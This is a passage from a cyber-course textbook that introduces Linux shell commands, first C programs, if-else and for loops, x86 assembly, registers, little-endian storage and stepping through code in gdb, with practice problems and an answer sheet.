operating system. The Linux operating system that is running in that window works the same way as if I bought a computer and installed Linux as the base operating system on it. Hopefully you are saying: Wonderful, I can run Linux using VMware. So, we now reach your second question: Why do we want to run Linux? Why not conduct EC310 just using the Windows environment? Linux has cornered a whopping 1.5% of the desktop operating systems market share (as of April 2015). Windows has over 90% of the market share. In fact, more people use the horror known as “Windows Vista” as use Linux. Really, please, come on, who uses Linux? So, why would we use Linux? I mean, for reasons other than sadism. 45 First, let’s note that for server operating systems—the operating systems that do the heavy lifting of managing web servers, managing email servers, and so forth—a different operating system—the UNIX operating system—far surpasses Windows in market share! Well over half of all servers run a variant of UNIX. Linux is a flavor of UNIX. But the real attraction of Linux is that it is open source. Anything and everything about Linux is available to be viewed. There are no trade secrets. Windows, on the other hand, is a proprietary commercial product. Microsoft only gives us the machine language code, not the source code. So, we really do not know the inner workings of Windows. How and why Windows operates the way it does is a trade secret. So, by using Linux, we can understand precisely what is going on, since the entire operating system is out in the open. And we want to understand precisely what is going on. So… shall we write some C programs? Well… not quite yet. First let's refresh ourselves on how the Linux directory structure is organized. First, we will usually work within the terminal window. The terminal window is shown below. You enter commands at the prompt. The prompt in the picture above is what says midshipman@EC310:~ $ All users of a Linux operating system have an account name (also referred to as a user name or a login name) and a password. When your Linux account is created, you are also given a home directory where all of your files and folders will reside. Your home directory has the same name as your account name. You may be wondering: Hey, I’m right now using Linux in EC310 and I was never asked for an account name and password while logging on? That is because your textbook author (Jon Erickson) has set up your VMware software to provide Linux “already open” for you. We have, however, changed your account name to midshipman since that is, after all, your first name. Even more specifically, the command line interface (where we enter commands) is called the bash shell. Every time you enter a command, you are entering the command at the bash shell’s prompt. The bash shell’s prompt for ordinary users is the dollar sign. Before the prompt, you will see your account name and your computer's name. Your account name Your computer's name The prompt There is one additional item in the picture above that you may have noticed: the tilde symbol (~). The tilde is an abbreviation for your home directory. When you log in, you are placed by default in your home directory. 46 Suppose you wander up to a computer and notice that someone is logged on, and you see then the user whose account name is joe has logged in but has forgotten to log out. Bad stuff. If you ever forget who you are, even though your account name is staring you in the face, you can enter: whoami as shown below: Go ahead… Enter whoami (you know you want to ) and confirm that you are indeed the user named midshipman. In Linux, just as with Windows, there are files. And in Linux, just as with Windows, there are directories (in Windows terminology, these are referred to as folders), which hold files (or other directories). A Linux system (like a Windows system) may support multiple users. In such cases, each user is given his own home directory. When you logon, you are automatically placed in your home directory. When Joe logs on, he is automatically placed in his home directory. Your home directory is the natural location for any directories or files that you create. You can leave your home directory and move to other directories. Whatever directory you find yourself in, that directory is termed your working directory. A portion of your Linux file system (also called a directory structure) looks like this: At the very top is the root directory, denoted /. The root directory contains all directories and files. Every Linux system has a special user named root. The root user is the great-and-all-powerful system administrator of the Linux system. The root user can access any file on the system, including the files of individual users. The root user can read the files of all users, can write over any files, and can delete any files. The root user can load any software onto the system (e.g., programs). The root user owns the system. The dream of all hackers is to somehow become the root user. In Linux, the root user has a special prompt, the pound sign (#). If you walk up to a computer and see this: 47 that means the root user has logged in and left the computer unattended. That would be bad, since that would mean you could look at all files on the system (for all users) and add any software you like to the system (including malware). Listing Files You can list the contents of the working directory by using the ls command. In your home directory, at the command prompt type: ls (note this is a lower case L) Question 1. List the contents of your working directory. Changing Your Working Directory Right now, your working directory is the same as your home directory: midshipman. Suppose you want to change your working directory to booksrc (see the directory structure shown above). To do this, type: cd booksrc When you change your working directory, the command line will update to indicate your new working directory. You should now see your prompt as: Working directory changed to ~/booksrc At any time, you can travel "up" one directory by typing cd .. Go ahead and enter this: That is, the two letters cd, followed by a space, followed by two periods (with no space between the periods). Note that cd stands for change directory. Since you were in the booksrc directory, you should have moved up one level back to your home directory. In other words, you should see this: Question 2. Starting at your home directory (where you should presently be), move up one directory and list the contents of your new working directory. If you are navigating around the directory structure, and you forget where you are, you can enter the command pwd which stands for print working directory. If you find yourself lost in the file system, you can instantly reset your working directory back to your home directory by simply typing cd by itself (i.e., without the two periods). Go ahead and type cd and confirm you are back in your home directory. Part 2: Your First C Program Now where were we… Oh yes! The C program! Before we begin, type the following at the prompt: cd work . That is, enter what is shown in bold below: 48 midshipman@EC310:~ $ This is the prompt cd work This is what you enter Your prompt should now be midshipman@EC310:~/work $ We will enter all of our programs in the work directory. Question 3. List the current contents of your work directory. We are going to enter our C program using a simple text editor named nano. Let’s name our first C program lastname_2_1.c where you use your own last name. So, if my last name is smith, I would name this program smith_2_1.c. So, enter the following at the prompt (again, using your own name instead of “smith”): midshipman@EC310:~/work $ nano smith_2_1.c This is the prompt This is what you enter Why did I pick the name smith_2_1.c ? The two stands for Security Exercise 2 (i.e., we are now conducting EC310 Security Exercise 2). The one stands for your first program. So, this is your first program in Security Exercise 2. You should see the editor opened with the correct file name at the top as shown below. Note the file name Now, carefully type the program below into the file smith_2_1.c #include <stdio.h> int main( ) { 49 } Your screen should look like this: Now we want to save this file. In nano, to save a file we use Control + o (that is, we press the Control key and the small letter o key at the same time). At that point nano will ask you if you want to still save the file under the original name. Just hit enter. Now, exit from nano by using Control + x. You should be back to the terminal prompt: You may now be wondering: How do I know the file that I just typed exists? Where is it? You already know the answer! To see all of your files enter the letters ls at the command prompt. So, at the prompt, type ls: midshipman@EC310:~/work $ ls and you should see: 50 So, your C file is there! Now remember, your C program is source code. The CPU does not understand source code—it only speaks in machine language. So we have to compile the source code into machine language using a compiler. The compiler we will use is gcc. So, at the prompt, compile your program by typing in gcc followed by the name of your C program. For me, I will enter: midshipman@EC310:~/work $ gcc smith_2_1.c Looking at the resulting screen…it looks like nothing happened. Linux just went right back to the prompt. Ask yourself… What should have happened? Linux should have created a machine language file. Did it? Linux automatically names the output of the C compiler as a.out. So…do you have a file named a.out? Let’s see. Type ls at the prompt and check if you have a file named a.out. I do! Joy! Alright…what do we do after we compile our program? We execute it! To execute the program, we simply type a period, followed by a slash, followed by the name of the executable code (the machine language file) at the prompt and hit enter. So, we should type midshipman@EC310:~/work $ ./a.out and hit enter and… and…and…nothing happened. Question 4. Why did nothing happen? Part 3: A C program that does something! It’s kind of a law of Computer Engineering that your first real program has to be a program that prints the message Hello World! to the monitor. Since this is the Naval Academy, we will modify this and write a more appropriate program that prints the message Hello Cruel World! to the monitor. Here are the steps. a) Using nano, open your existing file (for me, this file is smith_2_1.c). b) Modify your source code so that it will print the desired message with a blank line above and a blank line below the message. You should only need to add a single line of code to the program: a single printf statement. Remember that to get a new line you use the escape sequence: \n . c) Compile your program. d) Run your program. If all works well, you should see this: 51 Note the cruel message! And note the blank lines around the cruel message! When your program works correctly, show it to your instructor or lab tech. Your instructor or lab tech will sign Question 5 on the Security Exercise. UNIX Tips and Tricks Are you getting tired of typing in the exact same commands again and again? As you develop a file, you may have to open it for editing numerous times (by typing nano smith_2_1.c) , you may have to compile it again and again (by typing gcc smith_2_1.c), and you may have to execute it again and again (by typing ./a.out). Engineers often find themselves typing the same commands again and again and again. In an effort to make life easier, UNIX (well, actually it’s the bash shell) remembers the recent commands that you have entered at the command line. You can view the recent commands that you have entered by pressing the uparrow; each press of the up-arrow moves us back by one earlier command. So, say you want to enter nano smith_2_1.c and you know that you have recently entered this command. You can press the up-arrow repeatedly until you find the command, and then hit enter. UNIX will treat this as though you have typed in the command and pressed enter. You are urged to try this (since it allows you to avoid a huge amount of repetitive typing). Ask your instructor for help if, after reading this, you do not understand this feature. Enabling the mouse within the nano editor. You can make the mouse functional within the nano editor by starting the editor with the –m option. For example: nano –m smith_2_1.c). Part 4: The world’s simplest calculator! We want to write a program that will prompt the user to enter two integers. The program will then return the sum of the two numbers. An execution of your program should look exactly like the program below, where, in this case, the user entered the numbers 3 and 4. Your program should provide the correct answer for whatever two integers the user enters. Shown below is the program, except it is missing three lines of code. Your task is to complete the program. So, start by entering the program shown below as smith_2_2.c . Your goal is to replace the three comments with C code that makes the program work as intended. #include <stdio.h> int main( ) { int number1 , number2 , sum ; 52 printf("\nEnter two integers and I will tell you their sum: "); // line of code to read in the two values from the keyboard // line of code to add the two values together // line of code to print out the sum } Demo your working program to your instructor or lab tech. Your instructor or lab tech will sign your Security Exercise for completing the demo for Question 6. Question 7. How much total memory is taken up by your variables in the preceding program? Question 8. When I execute the preceding program, why do I have to run the file a.out? Why can't I just run the file smith_2_1.c ? 53 54 Security Exercise 2 Answer Sheet Name: Question 1: Question 2: Question 3: Question 4: Question 5: _____________________________ Instructor or Lab Tech Signature Question 6: _____________________________ Instructor or Lab Tech Signature Question 7: Question 8: 55 56 Chapter 3: Assembly Language and Memory Objectives: (a) Explain the operations of several basic assembly language commands, including mov, cmp, jmp, jle, jne and inc. (b) Demonstrate the ability to debug a running C program in memory, to include the inspection of processor registers and arbitrary memory locations (c) Demonstrate the ability to analyze C programs that employ if-else statements and for loops. (d) Apply Boolean logic to evaluate how selection structures can alter program flow. (e) Analyze existing programs for flaws with the gdb debugger. 1. A Little More C: The if-else selection structure and the for repetition structure The order in which program statements are executed is called flow of control. All of the programs that we have seen so far consist of statements executed in order, one after the other. As we will see, we often need to vary the order in which statements are executed. 1.1 The if-else statement Consider the following example Write a program that accepts the user’s GPA as an input and prints “You’re on the Dean's List!” if her GPA is greater than or equal to 3.5, and prints, “Keep trying!” if her GPA is less than 3.5. Right now, we can’t solve this simple problem because we have no way for a program to choose between alternatives. To solve this problem, C provides an instruction that allows the user to select which statements to execute based on the value of one or more variables. This useful C instruction is the if-else statement. The program that solves the problem above is shown below: If the value of the variable gpa is greater than or equal to 3.5, all of the statements between these two braces will execute. The statements within the braces after the else are skipped. If the value of the variable gpa is less than 3.5, all of the statements between these two braces will execute. The statements within the braces following the if will be skipped. #include<stdio.h> int main( ) { float gpa; printf( "Enter GPA: "); scanf( "%f" , &gpa ) ; if ( gpa >= 3.5 ) { printf("\nYou’re on the Deans List!\n"); } else { printf( "\nKeep trying!\n" ); } printf( "\nGo Navy!\n\n" ); } In the code above—immediately after the word if—we have a Boolean expression in parenthesis: gpa >= 3.5. A Boolean expression is an expression that always evaluates to either true or false. If this particular Boolean expression is true (i.e., if the value of the variable gpa is indeed greater than or equal to 3.5), the statements contained within the first set 57 of braces (following the word if) will be executed, and the statements within the second set of braces (following the word else) will be skipped. If, on the other hand, the Boolean expression is false, the statements within the braces following the word else will execute (and the statements within the braces following the word if will be skipped). Shown below are two separate executions of the program shown above. Note that in both cases, the printf statement printf( "\nGo Navy!\n\n" ); is executed. The simplest Boolean expression compares numbers and/or variables using a comparison operator. You should be familiar with the usual operators: >, >=, < and <=, == and !=. The table below summarizes these comparison operators. Comparison Operator > >= < <= == != Meaning Greater than Greater than or equal Less than Less than or equal Equal Not equal In C, we can check for equality by using two equals signs in a row, with no space between them. So, for example, a Boolean expression that can be used to check if a float variable named hours is equal to forty would be hours == 40 In C, we can check for inequality by using an exclamation sign followed by an equals sign. So, for example, a Boolean expression that can be used to check if a char variable named grade is not equal to F would be grade != 'F' There are two modifications we can make to the if-else statement. The first modification is that we don’t have to have the else part. In this case, the program performs the statements in braces following the word if when the Boolean expression is true, and skips these statements if the Boolean expression is false. Consider our earlier program without the else portion, and the corresponding screen captures: #include<stdio.h> int main( ) { float gpa; printf( "Enter GPA: "); scanf( "%f" , &gpa ) ; if ( gpa >= 3.5 ) { printf("\nYou’re on the Deans List!\n"); } printf( "\nGo Navy!\n\n" ); } The second modification is that if there is only a single statement within the curly braces of the if or the else, then the braces are optional. The programs shown above will work just as well without the braces surrounding the printf statements. 58 1.2. The for statement Many programs include some actions that must be performed again and again, some number of times—that is, we may want to repeat sections of our program again and again. A part of a program that repeats a number of statements is called a loop. Let's jump right into examining a program that uses a for loop, along with its corresponding output. #include<stdio.h> int main() { int count; for( count = 1 ; count <= 5 ; count = count + 1) { printf( "%d\n" , count ); } } Any statements within curly braces following the word for comprise the body of the loop; these statements will be executed each time the loop iterates. In this example, there is only one statement within the body of the for loop: printf( "%d\n" , count ); and so each time the loop iterates, the program will print out the value of the variable count, followed by a new line. The question remains: What controls the number of times the loop will iterate? In this example, the variable count will be used to determine the number of times the loop executes. When we enter the for loop, the loop control variable (i.e., count) is initialized: for( count = 1 ; count <= 5 ; count = count + 1) This tells how the loop control variable is initialized. This initialization occurs only once. Next, the program checks to see if the Boolean expression is true: for( count = 1 ; count <= 5 ; count = count + 1) The loop control variable is compared to 5. This Boolean expression is used to determine if the loop should execute. Since the variable count (at this point in time) is equal to 1, the Boolean expression is true and we execute the statement in the body of the loop. The output we see on the screen is: When we finish executing the body of the loop, we update the loop control variable: for( count = 1 ; count <= 5 ; count = count + 1 ) The loop control variable is updated. The loop control variable count is now equal to 2. We once again return to the Boolean expression: for( count = 1 ; count <= 5 ; count = count + 1) and see that it is true (2 is indeed less than or equal to 5) and we again execute the body of the loop. 59 The screen output is now: When we finish executing the body of the loop, we update the loop control variable: for( count = 1 ; count <= 5 ; count = count + 1 ) and count becomes 3. We then return to the Boolean expression, note that it is true, execute the loop, and update the loop control variable to 4. The loop executes again, and count is then updated to 5. The loop executes again (since 5 is less than or equal to 5) and count is then updated to 6. When count is updated to 6 the Boolean expression becomes false and we exit the loop. The final screen output is: Note that in the for loop the initialization is done only once, and we then "bounce back and forth" between the Boolean expression and the update of the loop control variable. for( count = 1 ; count <= 5 ; count = count + 1 ) We bounce back and forth between these two parts. This is done when we first enter the loop and never again repeated. A flowchart for the for loop is shown below: Initialization of loop’s control variable Boolean expression Initialization occurs only once! True Body of the loop False Update of loop’s control variable The update happens after the body of the loop is performed! Practice Problem 3.1 For each of the for loops shown below, state how many times the loop will iterate. a) for( i = 1 ; i <= 100 ; i = i + 1 ) b) for( i = 3 ; i > 1 ; i = i – 1 ) c) for( i = 7 ; i <= 21 ; i = i + 7 ) Solution: (a) (b) (c) 60 Practice Problem 3.2 Examine the following C program and describe the expected output. #include<stdio.h> int main( ) { int count; for( count = 1 ; count <= 2 ; count = count + 1 ) { if( count > 1 ) printf( "Cyber\n" ); else printf( "Fun\n" ); } } Solution: 2. Machine and Assembly Language To understand the damage that an adversary can inflict on your host computer, you have to know a little bit about programming, since, after all, a computer will only do what it is told to do, and a computer is told to do things via programs. But the programs—the software—are only half the story. To understand how a program can damage your computer, you have to know how the hardware interacts with the software. We examine the relationship between software and hardware by focusing on hardware that runs the x86 instruction set, the so-called x86 chip. This is by far the most common hardware implementation in PCs and servers. So, now that we know a little bit about software, let's go back to the machine! 2.1. Machine Language Examine the C program shown below. What does it do? #include<stdio.h> int main( ) { int x = 7; x = 2001; } Suppose we enter this program using nano, and then compile it using gcc. Remember that the gcc compiler converts the source code (which we humans like) to machine language (which the computer likes). The machine language code is written in the specific machine language for the x86 processor, which is the CPU in your computer. The file containing the machine language code (i.e., the executable file) is named a.out. We can run our program by entering: ./a.out . Remember that a CPU can only interpret very simple instructions that have been “hardwired” as electronic circuits on the CPU chip. This set of simple hardwired instructions is termed the instruction set. Each instruction in the CPU’s instruction set has associated with it a unique string of bits that the CPU can interpret. So, compilation converts the source code instructions to the correct bit strings that correspond to instructions from the CPU's instruction set. You may be wondering: If a computer can only carry out a small number of tasks (the limited number of simple instructions that have been “hardwired” as circuits on the CPU chip), how are computers able to perform complex operations? To gain an insight into the answer, consider that the complete works of Shakespeare, the English translation of the Bible and the US Constitution are all written using 26 letters, a space symbol and a few punctuation symbols. Similarly, massive programs can be built by combining the limited number of machine language instructions in various ways. 61 An Aside What is a.out? And why do I need to put a dot and a slash in front of a.out to execute my program? Since the CPU can only execute machine language instructions, a C program that you write must be converted into a machine language program before it can be executed by the CPU. This conversion is performed by the gcc compiler. #include<stdio.h> int main( ) { int count; .... gcc a.out my_program.c By default, the compiler gives the name a.out to the file containing the machine language program. When you recompile a program, a new a.out replaces (overwrites) any file named a.out that may already exist in the working directory. To execute the machine language code (i.e., to run your program), you have to specify the relative pathname to the file named a.out. Recall that a single dot (.) can be used as a shorthand for your current working directory. Thus, the relative path name to your machine language file is ./a.out . Later, you will learn how to change the name of your executable code to a file name of your choosing. So… what does the machine language program for our simple C program look like? Here is a picture of the machine language code for our program, beginning at the line that says int main( ). 7 Machine language is supposed to be bits… where are the bits? Recall that we use hexadecimal to represent binary more compactly. The machine language shown above is in hexadecimal. The machine language code is on the right. On the far left are the addresses in main memory where the machine language instructions are stored. The addresses are also presented in hexadecimal. So, let's add headings to our picture: address machine language instruction 7 Note that the first line of the program, #include<stdio.h>, creates object code too— but this standard program opening produces standard object code. We are primarily interested in the part of the program that we write (which comes after the line int main( )) so we’ll only focus on that. 62 Remember that any program that you run—MSWORD, Firefox, a video game—must be in main memory. The operating system decides where a program will actually be placed in memory. So, the line that reads 8048344: 55 8 means that at memory address 08048344 there exists the machine language instruction 55. Pictorially: So, the first instruction listed is 55 (remember, this is all hexadecimal—think of this first instruction as 0x55). Practice Problem 3.3 How many bits are in an address? Solution: Practice Problem 3.4 How many bits are represented by the hexadecimal number 55? Solution: And this number 0x55 means… what? If I looked up the x86 instruction set (e.g.: at http://sparksandflames.com/files/x86InstructionChart.html ) I would see that the instruction 55 means to push a specific specialized CPU variable into a location in memory where the CPU can retrieve it again later. So, if the first machine code instruction (55) takes one byte, where will the next instruction be located? The answer: At address 08048345. Each byte has its own address, and memory is numbered sequentially. So… why is the third instruction located at address 8048347? Shouldn’t it be 8048346? The instruction at 8048345 ( 89 e5 ) is two bytes. So, this instruction uses addresses 8048345 and 8048346. Similarly, we see that the next instruction consumes three bytes, so the following instruction is stored at address 804834a. (Recall, in hexadecimal, the number after 9 is a.) What would you guess that last machine language instruction (c3) does? If you guessed "finishes the program and returns to the operating system", you are correct! So, our program residing in main memory is shown below in Figure 3.1. The numbers to the left (e.g., 08048344) are the addresses in main memory. The contents of the boxes show the values stored at the memory locations. So, memory location 08048344 holds the value 0x55. 8 Notice that in the address listing above, the very top line shows the full address, but subsequent lines do not show the leading zeros. 63 Memory Address Value Stored at this Address Figure 3.1. Memory layout of our machine language program I’m sure you would agree: Machine language is fun! (Don’t worry… we won’t see a lot of machine language.) 2.2. Processor Registers The CPU fetches an instruction (like the instruction 0x55 at address 0x08048374 in Figure 3.1), decodes the instruction, and then executes the instruction. After the CPU executes an instruction, it fetches the next instruction. The sequence of steps fetch-decode-execute repeats until the program is finished. 64 How does the CPU keep track of which instruction it is at in memory? The CPU has some specialized variables that it uses to execute programs. Unlike variables that you declare in, say, a C program, these CPU variables are actually implemented in high-speed hardware called registers. The x86 has 16 of these variables, each already named and each intended for a specific purpose. Each register holds 32 bits. The most important CPU variable is eip. Memorize this name. This variable is the Instruction Pointer 9: This variable holds the address of the next instruction the CPU intends to execute. Many text books refer to the instruction pointer as the program counter. These two terms are synonyms. So, if the executable program shown at the top of the prior page is loaded into memory, the address 08048344 is placed in eip. Let’s add two more registers to our repertoire. You should also memorize these (along with eip): esp: The CPU reserves a section of memory, called the stack, to store values that the CPU might want to retrieve later. The esp variable is used to store the address of the "top" of the stack. The name esp stands for extended stack pointer, but it is usually just called the stack pointer. ebp: This variable is called the base pointer. This CPU variable is used to point to the "bottom" of the stack. (To be more precise, we will see later that ebp actually points to the very first address after the bottom of the stack.) 2.3. Assembly Language Okay, we want to see precisely what is going on in the CPU, but we can’t keep our sanity if we have to look at pictures like this: This picture shows machine language. Since we are not computers, machine language isn’t exactly intuitive to us. But unless we can get “into” the CPU, we don’t really know what is going on. So…we have to find a way to deal with the CPU instructions (machine language) without dealing with bits (or hexadecimal). The answer is to use assembly language! Remember that in assembly language, each machine instruction is replaced by an “English-like” word or mnemonic. Looking at the machine code above, we mentioned that the last instruction, c3, had us finish execution and return to the operating system. In assembly language, this instruction maps to ret (short for return). There is a one-to-one mapping between the assembly language instructions and the machine language instructions. Thus, assembly language is just an easier way to read machine language. Our simple program: #include<stdio.h> int main( ) { int x = 7; x = 2001; } is shown in assembly language. For convenience, the machine language is repeated in the middle. The assembly language appears on the right. 9 The “e” in eip stands for “extended.” The original instruction pointer was 16 bits, but it was later extended to 32 bits. 65 address machine language instruction assembly language instruction Now… you might be looking at the assembly language and thinking: “That’s easier???” Well, it will take some getting used to, but you will pick it up fast. For example, what do you think mov means? If you guessed move, you’re right. If you’re guessing that sub means subtract, right again! And note that we see the CPU variables ebp and esp that we talked about earlier flying around in the assembly code. Some assembly language instructions just specify an operation and do not have any operands, e.g.: leave ret Some assembly language instructions specify an operation and a single operand, e.g.: push ebp Some assembly language instructions specify an operation and two operands, e.g.: mov ebp, esp sub esp, eax For the two-operand assembly language instructions, it is important to note that first operand is the destination and the second operand is the source. So the instruction mov ebp, esp means: “Move the value of esp to ebp” and the instruction sub esp, eax means: “Subtract the value of eax from esp (so that esp is reduced by the amount eax).” Shown below is a cheat sheet of common assembly language instructions. It is suggested that you not grapple with this cheat sheet right now. Rather, it is suggested that you refer back to it when you later encounter an assembly language instruction that is unfamiliar. Instruction mov Meaning move Example mov DWORD PTR [esp],0x804848a cmp compare cmp DWORD PTR [ebp],0x4 jne jump if not equal jne 0x804839f jle jump if less than or equal jle 0x804839f 66 Explanation of the example Place the value 0x804848a in the location specified by the address in the esp register. Compare the value 4 to the value stored in the address contained within the ebp register. This instruction will always follow a comparison (cmp). If the two items in the prior comparison were not equal, then jump to the instruction stored at address 0x804839f. This instruction will always follow a comparison (cmp). If the first item in jmp jump jmp 0x804839f inc increment inc DWORD PTR [eax] the prior comparison is less than the second item in the prior comparison, then jump to the instruction stored at address 0x804839f. For example, if the prior comparison was cmp DWORD PTR [ebp],0x4, then if the value stored in the address pointed to by the ebp register is less than or equal to 4, we would jump to the instruction stored at address 0x804839f. Jump to the instruction located at address 0x804839f. Increment the value stored at the memory location contained within the eax register by one. 2.4. Program Autopsy: Case 1 Now, to really see what is going on, we can run this program one line at a time, and, at each step in the process, examine the CPU’s special variables (the registers) and any other memory locations we care to. We can step through an executable file and examine registers and memory by using a debugger. A debugger is a program that allows you to test and examine other programs. Here’s how to get started: Step 1. Start up VMware Workstation, navigate to your work directory be entering: cd work. Then using nano, open a new file named ch3demo.c by entering: nano ch3demo.c . Then enter the following program: #include<stdio.h> int main( ) { int x = 7; x = 2001; } Compile the program and ensure that it contains no syntax errors (recall that to compile your program you enter gcc ch3demo.c). Then run the program (by entering: ./a.out). You should see the results shown in the screen capture below. Wait – what happened? This program is very simple - it merely stores and changes the value of the variable x in memory. It doesn’t get input from the user (scanf), and it doesn’t display output either (printf), so there’s not much to see “on the outside” when the program is run. But what’s happening “on the inside” (in memory)? The debugger will help us figure that out. Step 2. Start the debugger by entering the following seven lines of code. Enter the commands below (don’t include the comments! – those are provided just to explain what is accomplished by each command). You should look at the screen capture below to follow along as you are entering commands. Your screen should look the same! gcc –g ch3demo.c // The –g part of this is new! Adding this provides some extra functionality // for the debugger. gdb –q // gdb is the name of the debugger. So, we are running the debugger on the // executable file named a.out ./a.out set dis intel // This displays the assembly code in standard Intel lingo list // This repeats the source code for convenience disassemble main // This shows the assembly code starting with the line that has main break main // This sets a “breakpoint” at main. So, when we run the program, it will stop 67 // at the first line of executable code that follows the line that has main run // This starts executing the program up to the first line of executable code // that follows the line that has main. So, the program's execution is "frozen" at the first real line of code (the first line of executable code that follows the line that has main.) So… where did the program freeze? Practice Problem 3.5 In the screen capture above, what assembly language instruction did the program stop at—i.e., what is the next instruction that will execute, and where in main memory is this instruction stored? Solution: You might be wondering: What about all the instructions before this one? Does that matter? The answer: This is code that the compiler has generated to set up memory for the program. We can safely ignore this for now. Since the two last assembly language instruction – leave and ret – are basically mop-up operations (all programs end with these two instructions), we really only have to concentrate on the two lines: 0x08048354 <main+16>: 0x0804835b <main+23>: mov mov DWORD PTR [ebp-4],0x7 DWORD PTR [ebp-4],0x7d1 What do we make of these two cryptic lines? To find out, we introduce two powerful commands: the info command and the examine command. Step 3. The info command. To look at the value of a register, we use the info (i) command. For example, to examine the eip register, you would enter the command 68 i r eip and to examine the esp register, you would enter the command i r esp Practice Problem 3.6 What is the value stored in the eip register? Does this answer make sense? Solution: Step 4. The examine command. To examine the value stored at a memory location, we use the examine (x) command. The format for the x command is: x/display_option location we want to display - use x for hexadecimal - to see the contents of an address, simply use the address - use u for decimal - to see the contents of an address in a register, use the - use i to display assembly language register name preceded by a dollar sign - use s to display the result as a string of characters So, the command starts with an x followed by a slash. Then we tell the debugger how we would like the memory location contents to be displayed. If we want the value to be displayed in hexadecimal, the display option is x. If we want the value to be displayed in decimal, the display option is u. If we want to display the contents of a memory location, we simply supply the memory location as the last argument. If we instead want to see the contents of a memory location whose address is in a register, we supply the register name preceded by a dollar sign. We can also control "how much" data is displayed. By default, the debugger displays 4 bytes for its answer. If we only want to display a single byte, we place the letter b right after the display option. To display two bytes, we place the letter h right after the display option. To display 4 bytes, we place the letter w after the display option. To display 8 bytes, we place the letter g after the display option. To summarize the examine command: Examine Command Cheat Sheet. x/_ _ location we want to display The first position specifies the format for the display. Use this table: x u i s hexadecimal decimal assembly language string The second position specifies the number of items we want to display. Use this table: b h w g byte half-word (2 two bytes) word (four bytes) giant (eight bytes) If the foregoing paragraphs have you bewildered, do not fear! We will do many examples! 69 To see the contents of a memory location, simply place the memory location here. To see the contents of an address whose location is stored in a register, place the register here, preceded by a dollar sign (e.g., $esp) Practice Problem 3.7 Refer to the picture shown in Figure 3-1. What should be printed out by each of the following commands? In each case, enter the command to confirm your answer. (a) x/xb 0x08048354 (b) x/xb 0x08048355 (c) x/xb 0x08048356 (d) x/xb 0x08048357 Solution: (a) (b) (c) (d) The above example is depicted in the extract from Figure 3-1, shown below. Now, recall that when we use b in the examine command, as in x/xb , the b stands for byte. When we issue the command x/xb 0x08048354 we are saying: "Show me the contents of main memory, starting at address 0x08048384, but only going one single byte into memory." If we want to see the contents of memory starting at address 0x08048354, but going two bytes (i.e., a half-word) into memory, we would enter: x/xh 0x08048354 . Practice Problem 3.8 What do you think will be displayed by the command: x/xh 0x08048354 ? Confirm your result. Solution: The x86 processor stores values in so-called little-endian order, which is the sequencing of digital storage such that the least significant byte is stored at the smallest address. This means that if I have a four byte quantity, the least significant byte goes in the first address, the second-least-significant byte goes in the next address, and so on. So, if we are to interpret a four-byte quantity as a single unit, the bytes must be reversed. The debugger reverses the bytes for us automatically. This is confusing, so let's look at this a little more carefully. As we mentioned, the program is halted at the instruction at address 08048354. We looked earlier at this section of main memory, exploring the results as machine language and assembly language: Memory address Value stored at this address 70 So, the assembly language instruction at address 08048354 is mov DWORD PTR [ebp-4],0x7. This assembly language instruction is stored in memory locations 08048354 through 0804835a inclusive. Here is the key point: The assembly language instruction mov DWORD PTR [ebp-4],0x7 is actually equivalent to the machine language 00 00 00 07 fc 45 c7 The question faced by the designers of the x86 was: In what order should we store 00 00 00 07 fc 45 c7 in memory? The answer for the x86 processor is to store the least significant byte in memory first, and then continue downward. So, the least significant byte (c7) goes into memory first (at address 08048354) then the next-least-significant byte (45) goes into the next address (08048355), and so forth. The debugger automatically reverses the little-Endian notation for us, restoring the proper order. Practice Problem 3.9 What do you think will be displayed by the command: x/xw 0x08048354 ? Confirm your result. Solution: Step 5. Using the examine command with registers. If we instead want to see the contents of a memory location whose address is in a register, we supply the register name preceded by a dollar sign. So, the command x/xb $eip means the following: "The instruction pointer holds an address (specifically, the address of the next instruction to be executed). Go to that address. Then tell me what is stored at that address, but only proceed one byte into memory please." 71 Practice Problem 3.10 What do you think will be displayed by the command: x/xb $eip . Confirm your result. Solution: The preceding example is explained by the picture below. The command x/xb $eip means that we should proceed to the memory location that is contained in the instruction pointer, and read off one byte. Practice Problem 3.11 What do you think will be displayed by the command: x/xh $eip . Confirm your result. Solution: Practice Problem 3.12 What do you think will be displayed by the command: x/xw $eip . Confirm your result. Solution: Practice Problem 3.13 What do you think will be displayed by the command: x/i $eip . Confirm your result. Solution: Step 6. Wonderful… so what does the program actually do? We mentioned that our program has two lines of code we care about: 0x08048354 <main+16>: 0x0804835b <main+23>: mov mov DWORD PTR [ebp-4],0x7 DWORD PTR [ebp-4],0x7d1 We know that the eip contains the first instruction's address: 0x8048354. If we were to execute one instruction and then freeze again, the instruction executed would be mov DWORD PTR [ebp-4],0x7 What does this cryptic instruction do? For starters, the register ebp is the base pointer (which, you may recall from earlier in this chapter, points to the memory address immediately below the bottom of the stack). The stack is a section of memory that our program has available to store any values it needs. The esp register contains the address of the "top" of the stack, and the ebp contains the address below the bottom. This assembly language instruction means (in plain English): Move the value 0x7 into the address pointed to by ebp-4 (the base pointer, minus 4). 72 The base pointer contains an address; this instruction will write the value 0x00000007 into the address 4 above the address contained in the base pointer. Let's look at a picture of the bottom of the stack. Suppose the base pointer contained the address 0xbffff818. Then that would mean that my program is storing all the information it needs (for example, variables) just above address 0xbffff818. See the picture below: So… If I know the value 0x00000007 is going to be placed in the address 4 above the ebp in memory, how does that change the image above? First, let’s figure out the address where the 7 is placed (ebp-4): - 0xbffff818 4 0xbffff814 That’s not so bad. So the 4-byte value 0x00000007 is going to begin at address 0xbffff814. Next, we have to remember the order in which those bytes are stored. (If you’re thinking, Little Endian – GREAT!) Remember, little endian order means that the least significant byte goes in the first address, the second-leastsignificant byte goes in the next address, and so on, so let’s take a look at how that applies to a 4-byte integer. The integer “7” is represented by the following 4 bytes: 0x 00 00 00 07 MSB (Most significant Byte) In memory, the least significant byte goes in the first address, like this: LSB MSB 73 LSB (Least significant Byte) To tie it all together - the “big picture,” if you will – the 4 bytes are placed in memory, with the least significant byte beginning at address 0xbffff814, like this: That’s probably enough pontificating about what will happen when the next instruction is executed... Let’s actually execute a single instruction, and then freeze again! Enter the command: nexti After you enter this command, you should see: 0x0804835b 5 x = 2001; Practice Problem 3.14 When you execute a command (as you just did when you typed nexti), what happens to the instruction pointer (eip)? Solution: Practice Problem 3.15 What is the value stored in the eip register? Does this answer make sense? Solution: We have advanced to the next instruction. The instruction at address 0x0804835b will be the next instruction to execute, as shown on the next page. Practice Problem 3.16 What should I type to examine memory to see the integer 7 that has just been placed on 